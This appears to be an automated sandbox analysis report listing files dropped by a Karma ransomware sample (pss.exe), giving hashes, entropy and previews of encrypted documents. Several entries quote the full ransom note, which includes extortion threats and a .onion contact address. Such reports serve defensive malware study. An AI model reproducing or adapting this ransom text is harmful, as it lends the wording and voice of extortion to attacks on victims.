Preview: .cjC..+.....6...n....I....w.....|.o.......Z.N2.M6.%j).pjv......KARMA.m....s..G...7..n3.R.....m.G..dt..)..c..%q.5....y....ed..u.(@lh...e.Z........A......Y.W[6Y.!Gs...\{8E....+.....~..............V..u.j.......8.....{...x..p...L.i.A....c....[...vF.._.._.Uc........lE.)...xE...Ie.!t....h.kB....5u........n..!1...-yx..Xv%.o.>[k..@o..xK....R.v&).6..9......z2.Ja.....|V.H.....}..v..L]..6....R1.....Y;.A...C.I...j.8.q..#.r./.D.......1zI\?L....r.b..d.3..[...e"t.=.=.2\...c.Q2....8.....b.+-.......x.............EW...."...J.&..Jz.d....M..d&. V....nw..S8>....B...A........\i's(.....>)..C*.ZPD.j.....:@.a.G.3m....)zM.zL1c:..|.[j..7.T.]J..Z&+.4..I.Z.8..OZ.u.c.H...X...R.2......%..%.B..aM....7h......)`.*Ec;^.9^......1h..}.........lk70..D..ZU..;..@U.t...e...O.w..~.o..G.:.... .c.3..%e..uf...l.E.........IP........7H..c........y.).....V...wd0......:....#8.. .M.<Gm.b.;h..;.....L....N...=..l.X'.....^.e...[.j.Ku.....r.q.(....d.....fUW@_.....9......sz....*.%.O.Q.?
C:\Users\user\Documents\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81205410196831
Encrypted:false
SSDEEP:24:CzKsIDMww2+ttmg7bnJ3b6d75uqDivTxpUEE59iG9Pyi:eK7DMZvttnJ3b6d7wqWvTjGsG3
MD5:0C10F713F76B38A740986181EC9D1D93
SHA1:B7AE6F384E5BCE87711A3E944FBB71D981EE3AC8
SHA-256:37D58AD7E13C8789E8EA57AD7E5965BF1C0FFC9E90466B52D7C7A036F6B67C4D
SHA-512:AE827B6DB9D8F5054C227DE457E723364DFEF58FC858B6FE46F3A37313B67D51A3D170258F1BF510F8728ECDD7CC5983F98CB7B32195D255D541C90BEB74975F
Malicious:false
Preview: `.H.r..........Hw.......}tG...OA.#.~.'...^...#!....v....pE...KARMAA>|..<L....eS..'.....g5.....{.6.&..3h:..I......G....Ux).J....(.......w.....?..X..Z|.Y(.(S..K...y".d4....z5.E.'..\./.B.....~..w.D...ON93.A.a..(.....U.-...+.].....`SUc.'./. 9..i.*...P..p[G~.Td...&.@.x.bm.&<.C.8.)..S.P&.s...=....R.B\~*...K....0a.*........X^....~y.lED6.......%.....J..G.;<....:.rM...-.. h....i........Q..l..}..d.S..2nr..j...(|=f....r;.....Jm{...'..|...R..SR..I.....x...0.-s.`....3.F.9.0. .8..`r.$.}.6P..?W-9...p...v....8....,.=..l....Y..%).Y_G.S.,.6.(..,gh.z.<.jn...).}g........J:.G..'..>b..7J.)?........)..._.....X.P7..v.Z......`c......]..}.4s..c.c...n...[..........Vh.g....)G.8.......,...B5..6.,.o....=.....d.G.&.s..F.6.j.2..d.!/.*WA..p.A...I.U..$.....,B.Q*;.Wu..%.T'..ok...*...m.........q6..2.+oF...JD.<I....z?I.M..Y=..:.'>YHn..-..}k.?....<..7{..4gW].YE.....G..q.8I. ....1..n.HI.7.....U..z.k.4...9.kMn..,].,...<..o.........sa.Z;6.*..@`...P..b^6.3..........9.....Z..!r
C:\Users\user\Documents\NYMMPCEIMA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802428226492806
Encrypted:false
SSDEEP:24:0JzIqWntLzTh4tOnznAh3aIKwrDg438vlVOn8J4a3gpesfQC:0hIqGtd4tc7+HKwr/stVOn8JRa
MD5:FAFA4A75479FA68F3926B841CEA172FE
SHA1:683A601D8237EFEEFAABC14C7E9098344B420F8F
SHA-256:65DC3CD3D3B9013F4CA2917CCF094F3B72CCB3F5AA6BE3551B28117A774C6C4B
SHA-512:4729991508CC203A5BC57868C810F4A61C46C688EFE885D7503393AE6AC7BAC65D01B7813EE0D98A7CF0EAC013C7C6D94360ABE25B8872D5C328256E7CFDA33F
Malicious:false
Preview: ..N....!.cz..}.a..WU..b#.k.D.....\..4&..0P1Hxi.P.J...X.\W..m....KARMAn...x...Z....."u...,-|........e...4$...[J..4.{..TR...UzS5.s..V...\..G.:s.T:....5../.....4P..;.H!m...E.#..1....|...3......Ur0.P.s!........7.]..$y.......]`../............A.$.YJ.i.7.F"..!1.$....w.>'zkj)%.....F...^.....v..T.;hJN....o....z..L..q..M9R..>...i.@>.{:........$..I..f.0<.z`.gSNO>...vx....V.I.8.A..&...A.$\.....Q...c.v.PR_K.....u.e.U......x..w"......a...;.!..t.........]..=.......e...p..O.yq..J.../..JM.....I....06..'.A..3V.2.L..4B/X....1/..Q.3.U.........@..4H.x.....K].fQNA..P..K...#xd..kA.U.....wt.MRb....@8......NU.....>..9oy?5O..s.5..X..Rd,..iBh.q4.T.7.....q/...F/qjG..!..d8bR3.}G..P.......P.V..fvT.]5......\s..[..*....x.~..-%..Fhb....(.l...Zt:U396..u.....S....N.Xl..r...S.3P....\L<.......<.m./...G.Z.PD.~.hxp.a.t..p.w.?........#d...hd.`~.8..7.j!S.}V..0.s.j.A.N..F..i...@.e...x..i..T.N.a`..G(.A.....N..p2.w.k.....g|.=...[.Y..0...^....oe.80..@..r..
C:\Users\user\Documents\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.821623393781539
Encrypted:false
SSDEEP:24:cHVYFhU+CxHyhujzJqNrag/mtQqAv/egG+Pi+6v16XH0:MYPc9xGu3tQXvmN+P16vEX0
MD5:A6425F6142861830938A2C4C6A92B844
SHA1:EFDD50CDB4F68B2362A13CED295DC9ECDEF800E6
SHA-256:168ED0CAF40C937FBDE6119C687DAEE0C67650DCAEFDF8751E34AE20FED2438F
SHA-512:C2DA7EB5526FBA0BDAB989CFA354B5E78D7DF79AE6A4A6FBB5E7BD7117CDFC8AA47C2C67AF08A8E2A1D00B1505CEAB84CEDB6741AE4EC1AC190C1E191CB5BBF4
Malicious:false
Preview: ........Y.N..r.kK...Z......(.b...P..esa./j...d>..?..(G:...KARMA2..k..............V/i.W?.4..au.. .0 05g\v*...Y.X.{\C|LO...7_..&i6....4k*....7.....%.P..?j.yua.l...... +...W.......88!$....0..H.mP<.....8..wM.\..'-.[.~E..S.hO.>IR..fZH]8V....`....qh.[.qIb...F..\.O8....Bf%.%+g".o.a. .? ...P2...]~+..1.Ll~..g...dj..<..._85....:\.#.......CE....JU.%M.Fq7.p.Q?...$............b.j~.\..B.I..8.B....g......Gz\...qO5G.8..M}F...F....w].J......1.X..Mm.%N.K....#j.m...C(..S.`....TJ2.,>{.[._`....1Ix.n..4.y.ez.......+......#W8....fr.>.`!....F.k...6.TTz..-.T=/Y..h.G....D3.dz).......n..X.8..,L.V.Fh......,.P.d.nh)..?^...2?I.|...D.@........w.j.....j...f.n..F.;.Tp......Y.J.b.....l.............t..........AQ!..e_..z.?..*}`.86..?..!O........!^...A..b.b.....4..{.<.....(.R..=.a...h.1Q..Z.f.+..vJH.$.....Mf.q.]4y*....e....i.vGk.F.C."....G.}.y..h..".R........@[.~-.R..=4...x.r..`da.zO.....p..};..qzOn;.<J.`s.6.........VOe..D....L..d.......u.O.vJ..L...R_.$..u......Kn.Y.....,
C:\Users\user\Documents\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813433140922798
Encrypted:false
SSDEEP:24:i0X5ukQMG20ZKiCYZNm5Ndu2vUcXYe/GWz/ue8S6cHCL3NJHxUz2:i85ukQ520EiCYL6NdhvNXYe+C8JDL7k2
MD5:16FF8916B02FD627F9B3A89C56C0BF1D
SHA1:4F5D7B9ECE2E5FA9512719BAEA682398C5CC6FA3
SHA-256:79DA0A48E5F096F17A046E5A3D034FD49E7A23D88FEFE2CE48068AF5E424247B
SHA-512:25F084E21E6E61555FCD2F318E472F22F47966BBE4F222287E612F0E57D81CFA97CD077B6ACCC2A02246766AB9122E1177DA387BF804569444CB268D447872B0
Malicious:false
Preview: .C.N&...L.b..i9-x)...9..h.B......;...c`..B.rUqm...6.n...~....KARMAY.t.%*.*.._.a.r...9..c,..m|...%.J...G.G...7......n.0B.AQ..0.. ...S...A...........[........k/.RmA..D&Q.[...-.<.......;.s. ._q.......jKE'. &v./...&J=......5..r.,I"..)..sH.....K..N]..m.nS&L..o.0..!k_{..z...t...{.g.n.e6.K..+Y.9.....%..vCh...1N..w.w.7..._BX..LEh...V.+.h..cI+i./..Uh(c*b.....<.y.'.r..c_...I..^.".zN.Q.......N<......4u.....#;.8.5g.Hc}....L.....J|$..j.u.f....&..Ly(..^.A\z..R..+..;.e.J....?.f......n...k.4...........Z0.8..)..|....l.?...}..tY.M.....GSvr..a.......9.........r4.W.S...(.Eq..].;.2.).-....{{.....@.//.?........sj%^..sY..\.3?.......7.N.NS.w.w.....zt^\D.....B.$.\.k8~..o...2......~......!L.=.]....,X...1.g..>..V.?y_...6.w(\.*F.7..pS.).....c.AN..f..n..2M......%/.....4.".i..t.._hQ..+.-p/.Wq....K.] 4....*Q...P......z+.#.]m...q..-.e,`fL..w...........nF......Qs....Y..".i.#}b.j........0x'}.v..C+.Q....-#<.u..uq6.r`N...=..0...N.h.#.o...,..B..|pM..u......g.$...+..@$..D..1y.g....
C:\Users\user\Documents\PWCCAWLGRE\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820970459397875
Encrypted:false
SSDEEP:24:2qS57xDTgglL0PQIsIEaS5M6XmYbsT3PcaGdMl2KzNCop:2qS5d5lg4+SrmYk37IKzLp
MD5:5F171F92B914A2E802066A9B93F1CB75
SHA1:629566999EB9A2C9B503E8A6E48B0E564B5E3476
SHA-256:C821AC0B8F484969F9AFA1E1E3B6A99E37B94E870A90B42CE671B082079EC6C0
SHA-512:0C223B9ACD15AEC20E01D054C439B459F622BC83302A3CC13544CAF421B317B95C2D2E73480B10E7ED789A3331573FD8C3140586B131D8B4FD6FDB8BCD928C2D
Malicious:false
Preview: :....}.../)...;.7...?-.6..7p.......Y.%B....xN9.....&U....qU.....KARMA.5.c...O......*o.p.)g....a...|.*.."...t..M.|...|ez{...33.X.c.......]...e.r..Y....p.h........-.|'..Y.=.(......{........N..%.|.@....'`....wk.}[....{T.=..k....Y_(C.Z.........{..~=.I.]2....q.|a...Q...P.ZlH..._.o.+./A|...R.....Z.e...Q...4.*.0[E.....p....F!.<.5\r.Q.?.AC.....$.UY.q.O..0..e..x.u-$a..A#.W;L.Rp.......;>.G]..d.....X3.&..E.`L)_..x.rOL..Jo....{...}.t.sf!....G.Z.\....1..TDf.j.9.2I.@..d.r..5........C..9VT.V...'...;......d......j......eWNS.t....o.......M.qN...a1..Q.GH..$...yG.=~\.3K.`JD.Y....{..l.."k4.`u....+.....X.M !..Q....#I.....c.BNx.....u...,*.|#Z..D....UC8.x?..?h..... ..YX....Ph......(U...5..Q....w.p...Rg.W...8.W.......3A.YlF]U.G-xI.y16..P...R..A...k#$..I.......%0?.9.HD}..,_.;. ..w.cb...}wG..%:.r... =<..f...9`......?.....U..UM...w.~..J......w+.v...Q(E.bj.....(.F.jF...3...cc.hE..n.;G..)G.Kw.;&...$f.=@..UL.......s../..+7u.r.D...R.......#.....n5....4d/r[.|.!.....M6...,o]....u..E
C:\Users\user\Documents\PWCCAWLGRE\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799303533827198
Encrypted:false
SSDEEP:24:S9iA3P21Zu/qjqGYdf8dnOQBbQDGndXhQ4j2JDoUPxSWmHD9IXKyT8h2ySNG:giSP21k8qGYSlOEBndXhihUz9w/k
MD5:AF59E7F2DEE2BD06AD09E713322F0CF4
SHA1:9FA5739F66FBF8074EFACE1322DD527812155BFE
SHA-256:319338BA687FBC5390E3420D405C712E4551204A036319E038A7ED3826C84730
SHA-512:1C21A4EA6A5091BD0878CBF09DE2E072910A697720A2315F75F714CEA0845C2F8914E97FAF34FEE017C4804AC7FF3E40B4BB421D27FDDF2C59CB5774DA922A1C
Malicious:false
Preview: .JFIz#O.Y...........Y...HG.......}.A..RX,os.hP.....&.m.b.......KARMA_.6..WV<g.i..../^........4....aJs.......1....o..T.N.ch..f.;.N.[7+W~.....o.Z....d..|...sN.e7g.G.V.b.d3....s.t.f..",/..E...^......l1v...9...xD......O.......a......Q....v..fp.f.8p..U.....g...>...p...,.....:.(...........A.4..0:N.Q..>OR...........'....X..q..<..@&....v.E..L..KZH.p:.Jj.j.A....a.yv.....p-..g>.. ......l....1.).6Qn.J^......f.fo..`I2..6.%..s......,.:.....j...S.. ..~_../.[}..."..P.......|.2r.7aB`.b"PA.l..r...rz.o....Y&0 .....Yh#5...;......I:..$m'..(...1:.c4.d.u.,...^)Z......7......N..s.....{L....JN...=e5..@.....#.MDy.+..V.*..k..<%..q|=D...u....w....+..=\..}.f....G.W...4.{....4...7.8..........&.....4NJ..".s[.+...B....*.v..... .wL.Hr.V...H..)ab..v.r...|7..^7v...wE..T...3..h...5....k.4......W?.i.....W.!...,.X,c..Sq.V......Y\...a?(.?...P..Q0.B.+7.._...*......s....j#|u.d..c.6_.8...7.f...?I.5...?AMC..........S.bN9.....lp..Q.HM#.V.D.M...6.h..A.)..2.......0.iV...gF....
C:\Users\user\Documents\PWCCAWLGRE\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819475330846343
Encrypted:false
SSDEEP:24:EKdvldpBjWvGfaL3tKeIl0Ae/6/dc03rtJ8O0Y5QOYhi7z7W1MWI8P:EKVld7oL3tRIleedBvEYyhE61MkP
MD5:F6C0E01228079BFF452EC6D83078F22C
SHA1:04829FF3E86E0E743787C0DEF2A005CCA366E165
SHA-256:A4A2D4DAF156AE603505F967CC57F012C2678668919A9A3C6B4D1796CB8A63E3
SHA-512:66DFB259E2BF07833DE1A8CD0A9685462340708B63CF4F3EADCD045DC2F2765081B63F26510B571CD57E4270CC5E933025BFB43B8911BE4D683C052E890E2516
Malicious:false
Preview: .k..!3..K..h........LU05.....m9a?^.?.l.Q......-..G...*l....KARMA.}.j.H.,..g,...w>.i............`..D.'.....&i.Y..H?.!n-.lk..H.H....B,....}C....7.MDi..*f=l..Yt .D..e....^.7P0.1..h.T4..N.....,.0........?h9.3....3p...J.no..Z.l.B..Z.})Z+.......)..1.(x.[0ct.....CU*.h..48>V%..Z..3b......7am.....l.~V..N- .6.9......G f.X!.I>..........:......w\....z.jww-.......\.WP..P.R.5..y.v..F....".3.U....D...'M..TJ..aU.hZ...V..^p{(......zOQ...V......Q.D..c.8...kW.>.?..u}....C3.$.c.dW..B..l...jU...S........eK\...t...]DS... cxs...Dmc..{...'..79Pi.)....O..F.)........H....@..G..+.8y..[....<o..+....j..7....G....)....B4.C...4.....V.Q!...V.r~.s..a.r....{..8wD.2..?.-...NU...&.g...E...........;...O...."s...3.;.\...-..Q..gv.DR.8{Aq#.>..W...n{`.L...Cl...{.uG...r.?....wz..._...*.o........>..7..]..!S.1...tHA...$.Y..C9...9a..;........^.G..3....#h.dy1,...9xG.mAcQ..s?\X..............U...q.Eg..$.......*.W..3.)....`...7.......'..ggH.Y+....%.[_..l.....@.A.)..R.kdx_..!...F.k.q.w
C:\Users\user\Documents\PWCCAWLGRE\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:SysEx File -
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829261338930429
Encrypted:false
SSDEEP:24:EFeGIZSVHFs8/uoiANXHiLYs9mGhE25B+BdHxgqke:BpZoHFsuJZHixtE252Fx5
MD5:90D99CC4381BD791F3767E62C1EFFB83
SHA1:5E67878F98DC50A589B8E47799591BAF02A6F97B
SHA-256:78F679301DED96134EA295DB49FA5A96C1AD8CE7C66EDFC3542523F4DC7E31BB
SHA-512:DD2AF44C1FA7A3B48DEF9FEF2EE41387534EE1A37D79D59E7BE63675AA40FD56C80C65C5ACA82D1B1DF5393214CD5B75F96935C7EF14BA0704C9E2D9B6AF90D6
Malicious:false
Preview: .S.....}?x`.."....rrY...........+P...bR...8...P..se.nK.Z.....KARMA..rI..@....HQ...G]6(...E.9.\...g......L90........M.w......g.VT...%.....K9..nzn%.Y....<.H..!0.t..t)R&..xc....W3.....pj.....z...tq.....E-..VTzv..V.J.iY...d&?..N.5\. @...5.....i.R.Q<.........Z.s..".Z.p.C.....?a.....x$L...Z..Q..V...E.f.#.u.E.5x.....b[..<..D..?.i..p.Hd....Y#.]...2.9O..$b'...V..j....Hh\g.%.yOe.M..*o...,Q.~....S9K..?.L.,CJn..,u.e.d.R.N.]:V..W..(..o..P&,[..JL7`.}.wg=.(v.h....3='"uw.<..uG.....`h.u:.USt......}C..k.L(...n.-bo....fl,..D....\<.. W../.O..e.E.......6....^..-M..8KL.........B..'........T.D..<.....z..zX.......=.<'F..]Bb.....N..*.PLo8...L..&..q................v.-..:.^...Qm.l.7?.w.d..DP..,V.-=.`=..mh..C_....e./.y. ..k..yg..I...3.{.6.n.2`m."..N.._.).....1|.....D...X....JWy9.r..'6:.G.DXH.+...,4.T.......5fHg.[.\."L..-D.....(..Kv_.~.qd.......^....>Q..=.K.Y.G.5..*g.h.^...4.{=+v.W.......xu)GQI......w.K.e..8.k.....:...'a.!....f..].....$....h......V|... .
C:\Users\user\Documents\PWCCAWLGRE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832926575046884
Encrypted:false
SSDEEP:24:0D1We6saxT74JKdNTQyxdeANNAMp5+MrOlTPZmZpE1:0Dr234cdNcyvpNJp5IEq1
MD5:36066FA0F0E80B052B6C0786F796DF1D
SHA1:9EC21A4DBAED440B417BE16F092E98B8F3D13EAB
SHA-256:95F66BCC4DA928D3DE88C597E7DFF4BD172938A42798E8294A7E067F8FC1C3E6
SHA-512:79DFE47E3C56A84F835E5E35D2BE7E8B00DDD466EEE3A32129CA615C51BE91464E3AEFA4FD9D6BEB29E462936220AA416316BB8DDB27D08A69E2C17E25EFFBB5
Malicious:false
Preview: ...x>@.+G.@x?...a.....v...._...~.....Iz..h..H...dN..a.. .....KARMADR.T...B.....g...w...IE..\..&./^~.`>>.~.^}.zq......H....t..>...X.t.f.|.0..g_...K.o.xN.#[.......qF....A..= P..(#.v.........ym..Y.........%{L...i.z4j..].GSJ..S..P.'.EwK...E!.z.l..,.,.....G0."V4@....`r...&Eq.J?T......~e?.....&|W..U..o`..3_..\..nh^Y~.e......E..w"...r.4.Q.W....nT......,.uO....l..'..h...T.....8.QK..#.PWh.[j....X..........H.d|?4;.C........a...l....r:.S.(.z.;f..r('.l.d.Y...=W.......y.g..iV.G&p.L..!3.....N.D`.B.,...3..Y|...Ck.X.?..<'....mh?..jp..<.e.iW.A1.|.>aY.R... .T...I'..}../e..{S..mW..g.* k,.M.J..n=..q..jw.x%....k.,!.V..._..j...)gm..C*v.%.\w.....,.|`.....`..%q.T...n.e%....s.p..8/..p.h.i6v0.\.b?U...5.7..;.Q..,.b/. e.iJ.5<..v.E.#..m.F{.`..? .i.F3.K......Tk.)h.~....uw+X..2M.0<I........`x....Pz....=..]...Y.[..9.........].K*..Lb..0.".w.a. ..6..~...>L...6.....j..o...J.....].T.?.....c..0.......2.[wk..f....~,&l...Cox.Z.Nu..1.-........2..d.....j.s.!..I.}..>.
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.831178858085952
Encrypted:false
SSDEEP:24:VqKVF+s0qx9t83zXJPld4oXGLCVo0W/cmS358fvYfGlyZwZLc5CiYzlgu/bn:Tn+sTNwJPldZWLmoB/u3Y6ZKLc5AzZ/b
MD5:1B83785D0110985EF3255F8AF5D91971
SHA1:2A63683D4AA74F3707138C1FA15E09710D12537E
SHA-256:2FFB586923EBBFE881FEDB71290F41926B06CD53C0A4ED89146A8EDC3EB136E1
SHA-512:195871144227E83E55C101127AA5A0A45CB64CD132C0BE2D580A0D0603997EE589929A4286BA200EEFA2CB82E28F4856BD552457B3F72A08EC7C2BFD4AE9DA73
Malicious:false
Preview: .,&..\..Y....H:.3....1N...VG.......v...;m<...vo.,....5.X..=...KARMAs...e.$...v@S...*....q....L.`...c3..$.X)h........:....n...h.G\..y.p....._..5..r.%.>......(2..$0L..,l.!.d.2l".-.^...G...h._w...M@....w..{dt.....}.K..n...W.."\'.S....z....Zn.......$..r./..\.l..v..B...U...r...-P..1....y.@....&...#'.g`.a....e....j...8~...73.(...^X.;.......<..P4.a.x....\...H&....)..9.O.L..'p.7...k.~..z.....i...x........{L...N..I..Z .jS..+.....:#....8.w.v.w..#...4...Zf...]....~Z?.).. .]...ujbX.......A)........cp.uBK..D............L.Vk...3$M.....9.0..X*Rs.....p..~./n....|..b.`p.9.F._ms..V..g...E.|w......d....]..q.....,...C....~L...|.AJ;..3f.j.uQ..H.Fp(!..S..}...../...&..i..'.5..SQ...j.......c.....=.`.M..MMH.c....\.`..J.......Q..d.|...P..Lo.,X......>....N......t..;|...s/....W.?{&2....Sw......E.A.a.xVl...D.dM. X..n..t..A........h.Mc,..~...M.V..~........S]5?.[.].I".*b.]..q.(kT..w...o7ea....n.......).R.S.ca....V!..v.,.....Rd`.b/..i....C"."$.._...X...m.........e@..x.~.G,
C:\Users\user\Documents\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805470265535074
Encrypted:false
SSDEEP:24:2nAkoajxIBIXuj1jO/K9qj+InTxrFGwDzSLzojb:bko2IBsuj5GKEyInTxrM+eLk3
MD5:1A52FFB1867EB6FD59C4C5A1221F896C
SHA1:04B566CC709396274AC78EAC69CC8A788511BF2B
SHA-256:15251A5BFA96230982627E6364337A65A86C92F254157BED58C9B54A2EBC0219
SHA-512:FA9098BA551BD05102813CC861F5113BF9C590B1E404E447F9A86696A202C25ED72210E973EEBE57189FA67DBDC926B954FD69D77A19C9513E1FF6053D1156A9
Malicious:false
Preview: PW..........U.*22|..Z..."2hg...XIiOR.z....s.J..q..07..5....KARMA....Sm.b.w[....!..c>8..A.j.$S.......%t.V.c.@ds.....x.e+..a.[.b.z.EHC]tG4_2. .FE.......@x...%...<..|..y{w.[.....]...{TN......%N..bv...b.=..w...).K..<.`..5.|......7.U..e..Z.a.0q.>u.....6..\?.k.k..>.......^.DP.Y.1.<Fj.3..Q..pb..$.A.......[.HJ..;..E..a..8.X......s.^.x9.E.7....X...H...2cf...q.[...{.y..v..x`)z^.x....q..A..0.[.....9+.0..2.Ay!.!+.B.zV"0.0.c....$b.1.w...i....~..N..a..HJ.>!NN@.~.:5....Aw.m0.O.......K......O......v..a../p...O.$..2..{#.qEC...G:..>.7...{..9.D2r9..7Kw\T..M[[....R.....:.b.....:+.... y..b.h....9P..1avqm.6..7..[....F.....7#.....Y.y.G......Q..=L8fB$....KA.*..}..A...n5.U.H........s.....8.UC:=Q./a.... .W....g..]._._'.yg}..H.y....(..'.Bk.L.9....T3..u...hj.a.f...\.F".N.l.I..W...hCLr......S<.._DVC.}..._.y.\.H)....\..z.n.ny..z...vqt3.....++XN.9v.m.o~......Y.....q.Q^......&g.....<..Gv.C..\Z.z..........=.....CA...7..m._R.O.E.....jR..S....8n......79...<&.{.D.#...i.@.
C:\Users\user\Documents\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832398142121143
Encrypted:false
SSDEEP:24:HUSRuafDjFi57jl1/vr9QS0u67Lz4X1Man++oMR3s5e:ZoQFiRr9QHuMLz4XmandoMNs5e
MD5:32045E297491334EBA3A26015CB6177C
SHA1:9E8DA3E17CE522A3790539B6CBB13B55262F83B1
SHA-256:2B202D9EAAE6F48C3761B44E2579C39783805DCD4E102425DB67996EC451751E
SHA-512:578565A173B6E878087F01CE369BC1096821C537248F152E54DDE28DA1EB2D96B5DC6D0F6EA891A59504014206C6076EC70505F75702A4CC3DD87925A9AD4219
Malicious:false
